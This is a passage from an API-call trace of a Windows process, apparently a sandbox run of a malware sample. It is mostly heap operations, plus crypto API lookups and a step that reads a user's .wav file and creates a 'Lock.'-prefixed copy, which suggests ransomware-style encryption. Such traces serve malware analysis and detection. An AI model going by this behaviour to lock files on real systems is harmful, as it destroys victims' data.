(in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0245.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0245.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0245.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0245.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0245.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0245.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0245.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0245.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0245.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51280 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51430 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51358 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ab0 [0245.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0245.227] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0245.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ab0 | out: hHeap=0x970000) returned 1 [0245.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0245.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0245.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0245.227] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0245.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0245.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0245.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0245.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0245.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0245.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0245.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0245.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0245.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0245.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0245.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0245.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0245.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0245.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0245.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0245.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0245.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0245.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0245.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0245.228] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0245.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0245.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0245.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0245.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0245.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0245.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0245.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0245.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0245.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0245.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0245.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0245.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0245.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0245.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0245.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0245.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0245.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0245.229] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0245.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b08 [0245.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0245.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0245.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0245.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0245.230] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0245.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0245.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0245.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0245.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0245.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0245.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0245.230] CryptDestroyHash (hHash=0xa87490) returned 1 [0245.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0245.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0245.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0245.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0245.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0245.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0245.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0245.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0245.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0245.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0245.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0245.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0245.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0245.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0245.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0245.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0245.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0245.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0245.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0245.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0245.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0245.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0245.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0245.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0245.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0245.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0245.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0245.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0245.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0245.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0245.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0245.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0245.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0245.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0245.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0245.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0245.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0245.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0245.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0245.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0245.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0245.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0245.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0245.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0245.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0245.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0245.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0245.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0245.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0245.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0245.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0245.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0245.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0245.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0245.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0245.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0245.239] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0245.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0245.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0245.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0245.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0245.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0245.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0245.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0245.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0245.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0245.239] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0245.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0245.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0245.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0245.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0245.300] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.300] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.300] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.300] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0245.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0245.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0245.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0245.301] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\J0 iAXcBYZXSdt.wav" (normalized: "c:\\users\\fd1hvy\\music\\j0 iaxcbyzxsdt.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0245.302] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.302] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0245.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0245.302] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0245.302] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.302] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0245.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0245.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0245.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0245.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0245.303] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music/" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0245.304] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music/Lock.J0 iAXcBYZXSdt.wav" (normalized: "c:\\users\\fd1hvy\\music\\lock.j0 iaxcbyzxsdt.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0245.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0245.306] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0245.306] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.306] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0245.306] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0245.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0245.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0245.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0245.309] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0245.309] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0245.314] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0xd6c, lpOverlapped=0x0) returned 1 [0245.314] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0245.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0245.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0245.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0245.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0245.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10d6c) returned 0x2f14010 [0245.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe53020 | out: hHeap=0x970000) returned 1 [0245.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0245.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0245.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0245.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0245.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0245.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0245.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0245.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0245.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10d6c) returned 0x2f24d88 [0245.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0245.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0245.320] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, 